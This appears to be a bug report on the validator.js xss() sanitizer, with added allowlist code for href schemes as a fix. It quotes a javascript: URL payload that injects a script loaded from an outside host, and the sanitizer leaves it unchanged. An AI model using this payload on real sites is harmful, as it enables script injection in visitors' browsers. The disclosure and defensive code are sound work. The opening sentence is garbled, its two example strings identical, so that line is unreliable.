xss() removes the string "javascript" from attributes; however, this is insufficient, since browsers interpret <a href="javascript:...">abc</a> as <a href="javascript:...">abc</a>.
Example
var validator = require('validator');
console.log(validator.sanitize("<a href=\"javascript:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')\">abc</a>").xss());
Expected
Actual (version 1.1.1)
<a href="javascript:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')">abc</a>
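The mitigation the report points at is not a better blacklist but an allowlist: decode the attribute value the way a browser would, strip the whitespace and control characters browsers ignore, and then accept only known-safe URL schemes. The following is an added example written for this page, not code from the validator project; the entity table is a deliberately small subset (an assumption, real HTML has many more named entities) and the allowed scheme set is a sample policy. The test input is the report's own href value.

```javascript
// Added example: allowlist-based href check. Instead of deleting the substring
// "javascript" (which a browser can still reconstruct from an encoded or
// whitespace-split attribute value), normalize first and then allow only
// explicitly permitted schemes.

// Small subset of named entities; a production decoder needs the full table (assumption).
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };

// Decode numeric (&#65; / &#x41;) and the named entities above, as an HTML
// attribute value would be decoded before the URL is parsed.
function decodeEntities(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// Sample policy: only these schemes may appear in an href (assumption).
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Returns true when the href is safe to keep, false when it must be dropped.
function isSafeHref(rawHref) {
  const decoded = decodeEntities(rawHref);
  // Browsers remove ASCII tab/newline anywhere in a URL and strip leading and
  // trailing C0 controls and spaces before reading the scheme.
  const cleaned = decoded
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (!scheme) {
    return true; // relative URL: no scheme at all, so it cannot be javascript:
  }
  return ALLOWED_SCHEMES.has(scheme[1].toLowerCase());
}

// Replace an unsafe href with an inert value rather than trying to "clean" it.
function sanitizeHref(rawHref) {
  return isSafeHref(rawHref) ? rawHref : '#';
}

// The href from the report above, run through the allowlist check.
const reportedHref =
  "javascript:var x=(document).createElement('script');x.src='http://www.example.org';(document).body.appendChild(x);(alert)('')";
console.log(isSafeHref(reportedHref));                     // false
console.log(sanitizeHref('https://example.org/?a=1&amp;b=2')); // kept as-is
```

The decode step runs once, mirroring a single attribute-value decode by the browser; the allowlist then decides on the normalized scheme, so an encoding that the browser would collapse into `javascript:` is judged by what it becomes, not by whether the literal substring is present.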